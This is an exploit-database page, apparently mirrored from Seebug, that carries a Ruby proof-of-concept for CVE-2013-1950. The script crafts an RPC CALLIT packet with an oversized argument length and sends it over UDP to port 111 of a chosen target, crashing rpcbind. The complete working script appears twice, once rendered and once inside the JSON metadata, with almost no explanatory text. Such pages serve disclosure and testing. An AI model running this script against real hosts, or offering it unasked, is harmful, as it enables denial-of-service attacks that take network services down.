Search...

rpcbind (CALLIT Procedure) UDP Crash PoC

2014-07-01T00:00:00

ID SSV:80510
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/ruby
#
#	rpcbind_udp_crash_poc.rb
#	07/15/2013
#	Sean Verity &#60;veritysr1980 [at] gmail.com&#62;
#	CVE 2013-1950
#
#	rpcbind (CALLIT Procedure) UDP Crash PoC
#	Affected Software Package: rpcbind-0.2.0-19
#
#	Tested on: 
#	Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP) 
#	CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)
#
#	rpcbind can be crashed by setting the argument length 
#	value &#62; 8944 in an RPC CALLIT procedure request over UDP.
#

require &#39;socket&#39;

def usage
	abort &#34;\nusage: ./rpcbind_udp_crash_poc.rb &#60;target&#62;\n\n&#34;
end

if ARGV.length == 1
	pkt = [rand(2**32)].pack(&#39;N&#39;)	# XID
	pkt &#60;&#60; [0].pack(&#39;N&#39;)			# Message Type: CALL (0)
	pkt &#60;&#60; [2].pack(&#39;N&#39;)			# RPC Version: 2
	pkt &#60;&#60; [100000].pack(&#39;N&#39;)		# Program: Portmap (100000)
	pkt &#60;&#60; [2].pack(&#39;N&#39;)			# Program Version: 2
	pkt &#60;&#60; [5].pack(&#39;N&#39;)			# Procedure: CALLIT (5)
	pkt &#60;&#60; [0].pack(&#39;N&#39;)			# Credentials Flavor: AUTH_NULL (0)
	pkt &#60;&#60; [0].pack(&#39;N&#39;)			# Length: 0
	pkt &#60;&#60; [0].pack(&#39;N&#39;)			# Credentials Verifier: AUTH_NULL (0)
	pkt &#60;&#60; [0].pack(&#39;N&#39;)			# Length: 0
	pkt &#60;&#60; [0].pack(&#39;N&#39;)			# Program: Unknown (0) 
	pkt &#60;&#60; [1].pack(&#39;N&#39;)			# Version: 1
	pkt &#60;&#60; [1].pack(&#39;N&#39;)			# Procedure: 1
	pkt &#60;&#60; [8945].pack(&#39;N&#39;)			# Argument Length
	pkt &#60;&#60; &#34;crash&#34;					# Arguments

	s = UDPSocket.new
	s.send(pkt, 0, ARGV[0], 111)
else
	usage
end

JSON Vulners Source

Initial Source

{"lastseen": "2017-11-19T15:25:29", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2013-1950"]}]}, "exploitation": null, "vulnersScore": 5.0}, "href": "https://www.seebug.org/vuldb/ssvid-80510", "references": [], "enchantments_done": [], "id": "SSV:80510", "title": "rpcbind (CALLIT Procedure) UDP Crash PoC", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 7, "sourceData": "\n #!/usr/bin/ruby\r\n#\r\n#\trpcbind_udp_crash_poc.rb\r\n#\t07/15/2013\r\n#\tSean Verity <veritysr1980 [at] gmail.com>\r\n#\tCVE 2013-1950\r\n#\r\n#\trpcbind (CALLIT Procedure) UDP Crash PoC\r\n#\tAffected Software Package: rpcbind-0.2.0-19\r\n#\r\n#\tTested on: \r\n#\tFedora 17 (3.9.8-100.fc17.x86_64 #1 SMP) \r\n#\tCentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)\r\n#\r\n#\trpcbind can be crashed by setting the argument length \r\n#\tvalue > 8944 in an RPC CALLIT procedure request over UDP.\r\n#\r\n\r\nrequire 'socket'\r\n\r\ndef usage\r\n\tabort "\\nusage: ./rpcbind_udp_crash_poc.rb <target>\\n\\n"\r\nend\r\n\r\nif ARGV.length == 1\r\n\tpkt = [rand(2**32)].pack('N')\t# XID\r\n\tpkt << [0].pack('N')\t\t\t# Message Type: CALL (0)\r\n\tpkt << [2].pack('N')\t\t\t# RPC Version: 2\r\n\tpkt << [100000].pack('N')\t\t# Program: Portmap (100000)\r\n\tpkt << [2].pack('N')\t\t\t# Program Version: 2\r\n\tpkt << [5].pack('N')\t\t\t# Procedure: CALLIT (5)\r\n\tpkt << [0].pack('N')\t\t\t# Credentials Flavor: AUTH_NULL (0)\r\n\tpkt << [0].pack('N')\t\t\t# Length: 0\r\n\tpkt << [0].pack('N')\t\t\t# Credentials Verifier: AUTH_NULL (0)\r\n\tpkt << [0].pack('N')\t\t\t# Length: 0\r\n\tpkt << [0].pack('N')\t\t\t# Program: Unknown (0) \r\n\tpkt << [1].pack('N')\t\t\t# Version: 1\r\n\tpkt << [1].pack('N')\t\t\t# Procedure: 1\r\n\tpkt << [8945].pack('N')\t\t\t# Argument Length\r\n\tpkt << "crash"\t\t\t\t\t# Arguments\r\n\r\n\ts = UDPSocket.new\r\n\ts.send(pkt, 0, ARGV[0], 111)\r\nelse\r\n\tusage\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-80510", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}